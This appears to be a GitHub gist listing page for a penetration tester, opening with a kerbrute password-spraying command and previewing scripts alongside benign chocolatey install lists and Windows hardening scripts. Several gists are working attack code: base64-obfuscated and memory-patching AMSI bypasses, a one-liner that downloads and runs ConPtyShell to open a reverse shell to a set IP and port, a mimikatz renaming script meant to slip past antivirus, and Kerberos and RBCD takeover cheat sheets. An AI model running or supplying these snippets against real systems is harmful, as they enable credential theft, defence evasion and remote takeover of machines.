With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
Michael Ritter michiiii
michiiii
/ gist:05747df03815e967a0f3488a9d84b9cf
Created
June 12, 2023 13:37
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $a64 = 'UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==' | |
| $a = [System.Text.Encoding]::Unicode.GetString([System.convert]::FromBase64String($a64)) | |
| $b64 = 'YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA==' | |
| $b = [System.Text.Encoding]::Unicode.GetString([System.convert]::FromBase64String($b64)) | |
| [Ref].Assembly.GetType($a).GetField($b,'NonPublic,Static').SetValue($null,$true) | |
| # new technique that works on Windows 11 | |
| $ZQCUW = @" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| choco feature enable -n allowGlobalConfirmation | |
| choco install -y 7zip | |
| choco install -y firefox | |
| choco install -y foxitreader | |
| choco install -y vcredist140 | |
| choco install -y git | |
| choco install -y sysinternals | |
| choco install -y microsoft-windows-terminal | |
| choco install -y wireshark | |
| choco install -y notepadplusplus |
michiiii
/ Harden.ps1
Created
February 25, 2023 23:13
— forked from hanfil/Harden.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Enable Windows Firewall | |
| Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled True | |
| # SMB # require elevated privileges # | |
| ## Turn on SMB signing and encryption | |
| Set-SmbServerConfiguration -RequireSecuritySignature $True -EnableSecuritySignature $True -EncryptData $True -Confirm:$false -Verbose | |
| ## Turn off the default workstations shares | |
| Set-SmbServerConfiguration -AutoShareWorkstation $False -Confirm:$false -Verbose |
michiiii
/ gist:309196ef7b6daa8b0a19509cd91271ea
Created
November 3, 2022 23:47
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ECHO Configure chocolatey | |
| choco feature enable -n allowGlobalConfirmation | |
| choco install -y 7zip | |
| choco install -y treesizefree | |
| choco install -y firefox | |
| choco install -y foxitreader | |
| choco install -y vlc | |
| choco install -y vcredist140 | |
| choco install -y vscode |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1) | |
| IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell -RemoteIp 192.168.178.149 -RemotePort 8080 -Rows 43 -Cols 237 |
michiiii
/ PowerView-3.0-tricks.ps1
Created
November 23, 2021 13:29
— forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
michiiii
/ mimikatz_obfuscator.sh
Created
November 23, 2021 13:28
— forked from S3cur3Th1sSh1t/mimikatz_obfuscator.sh
Mimikatz Obfuscator
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This script downloads and slightly "obfuscates" the mimikatz project. | |
| # Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ..., | |
| # so removing them from the project before compiling gets us past most of the AV solutions. | |
| # We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ...., | |
| # but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program. | |
| git clone https://github.com/gentilkiwi/mimikatz.git windows | |
| mv windows/mimikatz windows/candycrush | |
| find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g' | |
| find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g' |
michiiii
/ kerberos_attacks_cheatsheet.md
Created
November 23, 2021 13:24
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
michiiii
/ Workstation-Takeover.md
Created
November 23, 2021 13:23
— forked from S3cur3Th1sSh1t/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
- Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
- Relaying that machine authentication to LDAPS for configuring RBCD
- RBCD takeover
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
michiiii
/ PowerShellHardeningCheck.ps1
Last active
June 14, 2021 15:31
Checks a workstation regarding basic PowerShell hardening, Applocker and System
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Test-RegistryValue { | |
| param ( | |
| [parameter(Mandatory=$true)] | |
| [ValidateNotNullOrEmpty()]$Path, | |
| [parameter(Mandatory=$true)] | |
| [ValidateNotNullOrEmpty()]$Value | |
| ) |
NewerOlder